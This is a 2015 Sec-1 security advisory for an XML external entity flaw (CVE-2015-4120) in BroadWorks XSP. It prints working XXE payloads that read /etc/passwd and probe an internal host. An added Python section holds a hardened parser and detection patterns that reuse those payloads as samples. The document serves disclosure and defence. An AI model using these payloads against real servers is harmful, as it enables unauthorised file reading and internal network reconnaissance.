Sec-1 Advisory: BroadSoft BroadWorks XSP XML External Entity Injection

Sec-1 Security Advisory
Advisory Name : XML External Entity Injection in BroadWorks XSP XML Interface
Discovery Date : 23/03/2015
Release Date : 02/06/2015
Application : BroadWorks XSP XML Interface 17.0 XML Interface on TCP/8011
Platform : Linux
Severity : HIGH. Arbitrary File Retrieval
CVE : CVE-2015-4120
Discovered by : Jordan Carter, Holly Williams
Vendor Status : Resolved in May 2015 BroadWorks Update available from http://xchange.broadsoft.com/
Website : https://www.sec-1.com/blog
http://www.broadsoft.com/service-providers/products-applications/broadworks/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-4120

Vulnerability Summary

XML External Entity Injection

An XML external entity injection vulnerability was identified that allows an unauthenticated attacker to read arbitrary files from the server and enumerate internal web applications.
Applications that parse XML input may be exposed to security issues around XML External Entities. Many parsers resolve external entities by default, so an application remains vulnerable unless the developer takes deliberate steps to disable that behaviour.
If a parser allows an attacker to define external entities and then reference them, the attacker may be able to read arbitrary files, load content from applications that are only intended to be accessed internally, and potentially perform a denial of service against the application server. In very rare cases XXE can lead to remote command execution.

Exploit

When a specially crafted payload is supplied to the affected application listening on port TCP/8011 the server parses the supplied content as valid XML. This can be leveraged to read arbitrary server side files and communicate with internal network components.

Example Payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "file:///etc/passwd">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


The above payload can be transmitted with freely available tools such as telnet, and will result in a vulnerable server responding with the contents of the local /etc/passwd file. An attacker who is able to enumerate the location of sensitive files, such as configuration files, could gain unauthorised access to data such as system credentials. Additionally, it should be noted that internal systems that are generally not reachable by the attacker could be targeted with payloads such as:


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "http://10.50.1.1:80/">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


This will request the content from a web server residing at 10.50.1.1 on port 80. A payload such as this could allow an attacker to enumerate internal web applications, potentially gain access to confidential data, and conduct attacks on internal systems such as error-based SQL injection, potentially leading to further network compromise.
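The following Python is an added example, not code from the advisory or from BroadSoft's product: it shows the defensive counterpart to the two payloads above. A receiving service parses the XSP keepalive request with DTD processing refused outright (the DOCTYPE, entity-declaration and external-reference handlers all raise before any entity is resolved, which covers both the file:// and the http:// variants), and a companion check flags the same DTD constructs in captured request bodies for log review. The element names and namespace come from the advisory's payloads; the function names, the handler structure and the sample request bodies are constructed here for illustration.

```python
import re
from xml.parsers import expat

# Constructed sample bodies, modelled on the keepalive request shape shown in the advisory.
BENIGN_KEEPALIVE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0">'
    '<requestId>abc123</requestId><period>30</period></xsp:keepalive>'
)
XXE_FILE_KEEPALIVE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE convert[ <!ENTITY c SYSTEM "file:///etc/passwd">]>'
    '<xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0">'
    '<requestId>&c;</requestId><period>30</period></xsp:keepalive>'
)
XXE_HTTP_KEEPALIVE = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE convert[ <!ENTITY c SYSTEM "http://10.50.1.1:80/">]>'
    '<xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0">'
    '<requestId>&c;</requestId><period>30</period></xsp:keepalive>'
)


class XmlRejected(ValueError):
    """Raised when a request carries DTD constructs the interface never needs."""


# Each handler raises, which makes expat abort the parse before any entity is resolved.
def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise XmlRejected("DOCTYPE declarations are not accepted")


def _reject_entity_decl(name, is_param, value, base, sysid, pubid, notation):
    raise XmlRejected("entity declaration refused: %s" % name)


def _reject_external_ref(context, base, sysid, pubid):
    raise XmlRejected("external entity reference refused: %r" % (sysid,))


def parse_keepalive(body):
    """Parse a keepalive request with DTD processing refused (hypothetical server-side handler).

    Returns {'requestId': str, 'period': int} or raises XmlRejected / ExpatError."""
    parser = expat.ParserCreate(namespace_separator="}")
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.EntityDeclHandler = _reject_entity_decl
    parser.ExternalEntityRefHandler = _reject_external_ref

    fields = {}
    state = {"current": None}

    def start(name, attrs):
        local = name.rsplit("}", 1)[-1]  # strip the namespace URI expat prepends
        if local in ("requestId", "period"):
            state["current"] = local
            fields[local] = ""

    def end(name):
        state["current"] = None

    def chars(data):  # character data may arrive in several chunks; accumulate it
        if state["current"] is not None:
            fields[state["current"]] += data

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(body, True)
    if "requestId" not in fields or "period" not in fields:
        raise XmlRejected("keepalive missing requestId or period")
    fields["period"] = int(fields["period"])
    return fields


def keepalive_accepted(body):
    """True if the body parses cleanly under the hardened parser, False if it is refused."""
    try:
        parse_keepalive(body)
    except (XmlRejected, expat.ExpatError, ValueError):
        return False
    return True


# Detection side: DTD constructs that have no business in a keepalive request.
INDICATOR_PATTERNS = {
    "doctype": re.compile(r"<!DOCTYPE\b", re.I),
    "entity_decl": re.compile(r"<!ENTITY\b", re.I),
    "system_id": re.compile(r"\bSYSTEM\s+[\"'](?P<uri>[^\"']*)[\"']", re.I),
    "parameter_entity": re.compile(r"%[A-Za-z_][\w.-]*;"),
}


def xxe_indicators(body):
    """Return {indicator: detail} for DTD constructs found in a captured request body."""
    found = {}
    for label, pattern in INDICATOR_PATTERNS.items():
        match = pattern.search(body)
        if match:
            found[label] = match.groupdict().get("uri") or match.group(0)
    return found


if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_KEEPALIVE), ("file", XXE_FILE_KEEPALIVE), ("http", XXE_HTTP_KEEPALIVE)]:
        print(name, "accepted:", keepalive_accepted(sample), "indicators:", xxe_indicators(sample))
```

Refusing the DOCTYPE at parse time is the fix that closes the issue regardless of which URI scheme the entity points at; the indicator scan is the cheaper check to run over recorded requests to the XML interface when looking for attempts against unpatched hosts, with the extracted SYSTEM URI telling a reviewer whether a file or an internal network address was the target.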

Vendor Response


The vendor has patched the XXE Injection issues in the May 2015 BroadWorks update. Sec-1 would like to thank BroadSoft for their prompt and professional response.

Additional CVE Details


The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2015-4120 : Assigned to the XML External Entity (XXE) discovery. Assigned Bug ID# TAC-129144 by BroadSoft.
Copyright 2015 Sec-1 LTD. All rights reserved.
